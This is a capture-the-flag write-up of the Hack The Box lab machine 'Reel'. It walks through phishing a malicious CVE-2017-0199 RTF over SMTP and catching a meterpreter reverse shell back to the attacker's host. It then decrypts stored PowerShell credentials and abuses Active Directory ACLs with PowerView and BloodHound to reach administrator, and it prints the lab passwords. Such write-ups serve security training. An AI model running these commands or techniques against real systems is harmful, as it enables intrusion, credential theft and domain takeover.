Writeup: Hack The Box - Machines - Reel

(Updated: )
writeups
,

Description

  • Name: Reel
  • IP: 10.10.10.77
  • Author: egre55
  • Difficulty: 5.4/10

Discovery

nmap -sV -sC -Pn -p 1-65535 -T5 10.10.10.77

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
21/tcp open  ftp     Microsoft ftpd
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_05-29-18  12:19AM       <DIR>          documents
| ftp-syst:
|_  SYST: Windows_NT
22/tcp open  ssh     OpenSSH 7.6 (protocol 2.0)
| ssh-hostkey:
|   2048 82:20:c3:bd:16:cb:a2:9c:88:87:1d:6c:15:59:ed:ed (RSA)
|   256 23:2b:b8:0a:8c:1c:f4:4d:8d:7e:5e:64:58:80:33:45 (ECDSA)
|_  256 ac:8b:de:25:1d:b7:d8:38:38:9b:9c:16:bf:f6:3f:ed (ED25519)
25/tcp open  smtp?
| fingerprint-strings:
|   DNSStatusRequestTCP, DNSVersionBindReqTCP, Kerberos, LDAPBindReq, LDAPSearchReq, LPDString, NULL, RPCCheck, SMBProgNeg, SSLSessionReq, TLSSessionReq, X11Probe:
|     220 Mail Service ready
|   FourOhFourRequest, GenericLines, GetRequest, HTTPOptions, RTSPRequest:
|     220 Mail Service ready
|     sequence of commands
|     sequence of commands
|   Hello:
|     220 Mail Service ready
|     EHLO Invalid domain address.
|   Help:
|     220 Mail Service ready
|     DATA HELO EHLO MAIL NOOP QUIT RCPT RSET SAML TURN VRFY
|   SIPOptions:
|     220 Mail Service ready
|     sequence of commands
|     sequence of commands
|     sequence of commands
|     sequence of commands
|     sequence of commands
|     sequence of commands
|     sequence of commands
|     sequence of commands
|     sequence of commands
|     sequence of commands
|_    sequence of commands
| smtp-commands: REEL, SIZE 20480000, AUTH LOGIN PLAIN, HELP,
|_ 211 DATA HELO EHLO MAIL NOOP QUIT RCPT RSET SAML TURN VRFY

Pwn

First we downloaded all the files from the FTP:

The readme states:

1
2
3
please email me any rtf format procedures - I'll review and convert.

new format / converted documents will be saved here.

So we need to send a malicious RTF document to the machine using the SMTP service on port 25.

We first need an email address to send these emails and from the FTP’s files we discovered some email addresses.

1
<cp:coreProperties xmlns:cp="http://schemas.openxmlformats.org/package/2006/metadata/core-properties" xmlns:dc="http://purl.org/dc/elements/1.1/" xmlns:dcterms="http://purl.org/dc/terms/" xmlns:dcmitype="http://purl.org/dc/dcmitype/" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"><dc:creator>nico@megabank.com</dc:creator><cp:revision>4</cp:revision><dcterms:created xsi:type="dcterms:W3CDTF">2017-10-31T18:42:00Z</dcterms:created><dcterms:modified xsi:type="dcterms:W3CDTF">2017-10-31T18:51:00Z</dcterms:modified></cp:coreProperties>

We found an email address: nico@megabank.com but also LAPTO12.HTB.LOCAL and WEF.HTB.LOCAL in the docx file.

From metasploit we found an exploit called exploit/windows/fileformat/office_word_hta created for the CVE-2017-0199 to craft a malicious RTF file with a meterpreter payload.

And with alpine we sent an email to reel@htb.local (or any other address in htb.local domain).

N.B. on alpine we need to set as our domain: htb.local and as SMTP server the IP 10.10.10.77.

And we got a session!!

Once inside we first searched for the user flag and some infos about the user.

In the same folder we found another file called cred.xml which contains a PSCredential object

1
2
3
4
5
6
7
8
9
10
11
12
13
<Objs Version="1.1.0.1" xmlns="http://schemas.microsoft.com/powershell/2004/04">
  <Obj RefId="0">
    <TN RefId="0">
      <T>System.Management.Automation.PSCredential</T>
      <T>System.Object</T>
    </TN>
    <ToString>System.Management.Automation.PSCredential</ToString>
    <Props>
      <S N="UserName">HTB\Tom</S>
      <SS N="Password">01000000d08c9ddf0115d1118c7a00c04fc297eb01000000e4a07bc7aaeade47925c42c8be5870730000000002000000000003660000c000000010000000d792a6f34a55235c22da98b0c041ce7b0000000004800000a00000001000000065d20f0b4ba5367e53498f0209a3319420000000d4769a161c2794e19fcefff3e9c763bb3a8790deebf51fc51062843b5d52e40214000000ac62dab09371dc4dbfd763fea92b9d5444748692</SS>
    </Props>
  </Obj>
</Objs>

This object could be manipulated only on the same computer of the owner of the file (HTB\nico).
From a powershell shell from meterpreter we can get the password for HTB\Tom with this command: $credential = Import-CliXml -Path 'C:\Users\nico\Desktop\cred.xml';$credential.GetNetworkCredential().Password.

First we load the file a Credential as SecureStringand then we can access those encrypted information.

The password for the user tom is: 1ts-mag1c!!!.

Now we can SSH into the machine with this combination.

Tom groups informations (net user tom)

1
2
3
4
Local Group Memberships      *Print Operators
Global Group memberships     *Domain Users         *SharePoint_Admins
                             *MegaBank_Users       *DR_Site
                             *HelpDesk_Admins      *Restrictions

Using reg query "HKLM\SOFTWARE\Microsoft\Windows NT\Currentversion\Winlogon" we found the password for the user nico: 4dri@na2017!**. Yes, this is useless for our privesc proces :)

In C:\Users\tom\Desktop\AD Audit we have BloodHound folder and note.txt:

1
2
3
Findings:
Surprisingly no AD attack paths from user to Domain Admin (using default shortest path query).
Maybe we should re-run Cypher query against other groups we've created.

BloodHound is a tool to reveal hidden and unintended relationships within an Active Directory environment; the tool require a recon phase to read all informations from the AD: this data collection is possible with PowerView (from PowerSploit).

Luckly in the BloodHound folder there is the BloodHound_Old.ps1 script and to use it we simply Import-Module ./BloodHound_Old.ps1 and with Invoke-BloodHound we can create the CSV files with all informations.

To download our files we create a meterpreter session: msfconsole -x "use exploit/multi/script/web_delivery; set target PSH; set payload windows/x64/meterpreter/reverse_tcp; set srvhost 10.10.14.169; set LHOST 10.10.14.169; set LPORT 3487; run".

Now have all the data for BloodHound (you need to install it on you machine with neo4j).

From the BloodHound application we can query the DB create with out CSVs to find the shortest path to Domain Admins.

From the note, unfortunately, we know that we can’t exploit a shortest path to Domain Admins so we need to run Cypher to query the shortest path for others groups.

With /usr/share/neo4j/bin/cypher-shel we have a command line query interface for the boltDB create within BloodHound (or from the Raw Query in BloodHound GUI).

With Get-ADGroup -filter * -properties GroupCategory | ft name,SamAccountName we got all groups in AD:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
name                                                            SamAccountName
----                                                            --------------
WinRMRemoteWMIUsers__                                           WinRMRemoteWMIUsers__
Administrators                                                  Administrators
Users                                                           Users
Guests                                                          Guests
Print Operators                                                 Print Operators
Backup Operators                                                Backup Operators
Replicator                                                      Replicator
Remote Desktop Users                                            Remote Desktop Users
Network Configuration Operators                                 Network Configuration Operators
Performance Monitor Users                                       Performance Monitor Users
Performance Log Users                                           Performance Log Users
Distributed COM Users                                           Distributed COM Users
IIS_IUSRS                                                       IIS_IUSRS
Cryptographic Operators                                         Cryptographic Operators
Event Log Readers                                               Event Log Readers
Certificate Service DCOM Access                                 Certificate Service DCOM Access
RDS Remote Access Servers                                       RDS Remote Access Servers
RDS Endpoint Servers                                            RDS Endpoint Servers
RDS Management Servers                                          RDS Management Servers
Hyper-V Administrators                                          Hyper-V Administrators
Access Control Assistance Operators                             Access Control Assistance Operators
Remote Management Users                                         Remote Management Users
Domain Computers                                                Domain Computers
Domain Controllers                                              Domain Controllers
Schema Admins                                                   Schema Admins
Enterprise Admins                                               Enterprise Admins
Cert Publishers                                                 Cert Publishers
Domain Admins                                                   Domain Admins
Domain Users                                                    Domain Users
Domain Guests                                                   Domain Guests
Group Policy Creator Owners                                     Group Policy Creator Owners
RAS and IAS Servers                                             RAS and IAS Servers
Server Operators                                                Server Operators
Account Operators                                               Account Operators
Pre-Windows 2000 Compatible Access                              Pre-Windows 2000 Compatible Access
Incoming Forest Trust Builders                                  Incoming Forest Trust Builders
Windows Authorization Access Group                              Windows Authorization Access Group
Terminal Server License Servers                                 Terminal Server License Servers
Allowed RODC Password Replication Group                         Allowed RODC Password Replication Group
Denied RODC Password Replication Group                          Denied RODC Password Replication Group
Read-only Domain Controllers                                    Read-only Domain Controllers
Enterprise Read-only Domain Controllers                         Enterprise Read-only Domain Controllers
Cloneable Domain Controllers                                    Cloneable Domain Controllers
Protected Users                                                 Protected Users
DnsAdmins                                                       DnsAdmins
DnsUpdateProxy                                                  DnsUpdateProxy
Exchange Install Domain Servers                                 $831000-BCI3MP5FNBO5
Backup_Admins                                                   Backup_Admins
AppLocker_Test                                                  AppLocker_Test
SharePoint_Admins                                               SharePoint_Admins
DR_Site                                                         DR_Site
SQL_Admins                                                      SQL_Admins
HelpDesk_Admins                                                 HelpDesk_Admins
Restrictions                                                    Restrictions
All_Staff                                                       All_Staff
MegaBank_Users                                                  MegaBank_Users
Finance_Users                                                   Finance_Users
HR_Team                                                         HR_Team

The syntax for Cypher is not easy but is well documented and full of examples: https://blog.cptjesus.com/posts/introtocypher.

The query for searching the group nodes that can be returned to only the DOMAIN ADMINS@HTB.LOCAL from the n nodes finding the shortest path is: MATCH (n:User), (m:Group {name: "DOMAIN ADMINS@INTERNAL.LOCAL"}), p=shortestPath((n)-[*1..]->(m)) RETURN p.

First we need to search all groups that have admin right: MATCH (n:Group) WHERE n.name =~ "(?i).*ADMINS.*" WITH n MATCH (n)<-[r:MemberOf*1..]-(m) RETURN n,r,m; with this query we got all admins group and their relationships

Using this command Import-Module ActiveDirectory;cd ad:;(Get-Acl(Get-ADGroup -Filter 'name -eq "backup_admins"').DistinguishedName).access | ft identityreference, accessControlType -AutoSize we can read which rights a group has over the system.

Since tom is member of SharePoint_Admins_ and _HelpDesk_Admins we can skip this two groups; backup_admins is our target group since a backup routine/user should access all data (including our root.txt inside the Administrator folder). From tom we can’t add any user to backup_admins so we need to exploit another user.

We found out that we can use claire to access backup_admins group: tom is a WriteOwner for claire.

In order to privesc to claire we check the rights from tom to claire within BloodHound (bruteforcing user all the users).

We found that tom can set the WriteOwner right over claire: we can reset the user password from tom.

1
2
3
4
5
6
cd "C:\Users\tom\Desktop\AD Audit\BloodHound"
$upwd = ConvertTo-SecureString "1ts-mag1c!!!" -AsPlainText -Force;
Import-Module ./PowerView.ps1
Set-DomainObjectOwner -identity claire -owneridentity tom
Add-ObjectACL -TargetIdentity claire -PrincipalIdentity tom -Rights ResetPassword
Set-ADAccountPassword claire -NewPassword $upwd –Reset

This script will use PowerView to change the default password of claire to the same of tom.

Now we can SSH as claire.

But we cannot add claire to backup_admins with Add-ADGroupMember -Identity "backup_admins" -Members claire so from tom session we used

1
2
3
4
5
cd "C:\Users\tom\Desktop\AD Audit\BloodHound"
$upwd = ConvertTo-SecureString "1ts-mag1c!!!" -AsPlainText -Force;
Import-Module ./PowerView.ps1
$cred = New-Object System.Management.Automation.PSCredential('HTB.LOCAL\Claire', $upwd)
Add-DomainGroupMember -Identity "backup_admins" -Members 'Claire' -Credential $cred

to add claire to our backup_admins group. Now we can SSH as claire with read permission on the Administrator folder:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
PS C:\> net user claire
User name                    claire
Full Name                    Claire Danes
Comment
User's comment
Country/region code          000 (System Default)
Account active               Yes
Account expires              Never

Password last set            7/24/2018 7:59:49 PM
Password expires             Never
Password changeable          7/25/2018 7:59:49 PM
Password required            Yes
User may change password     Yes

Workstations allowed         All
Logon script
User profile
Home directory
Last logon                   7/24/2018 6:42:19 PM

Logon hours allowed          All

Local Group Memberships      *Hyper-V Administrator
Global Group memberships     *Backup_Admins        *Domain Users
                             *MegaBank_Users       *DR_Site
                             *Restrictions

But we cannot access the root.txt file:

On the admin desktop folder we found some script used to backup file over the system into a shared folder \\BACKUP03.

We cannot access that folder but we found at the head of the BackupScript.ps1:

1
2
# admin password
$password="Cr4ckMeIfYouC4n!"

Using this password to SSH with administrator we can read the root flag!

BloodHound resources

https://porterhau5.com/blog/representing-password-reuse-in-bloodhound/

https://porterhau5.com/blog/extending-bloodhound-track-and-visualize-your-compromise/

https://github.com/BloodHoundAD/Bloodhound/wiki

https://blog.cptjesus.com/posts/introtocypher

https://blog.stealthbits.com/attacking-active-directory-permissions-with-bloodhound/

https://wald0.com/?p=112

https://threat.tevora.com/lay-of-the-land-with-bloodhound/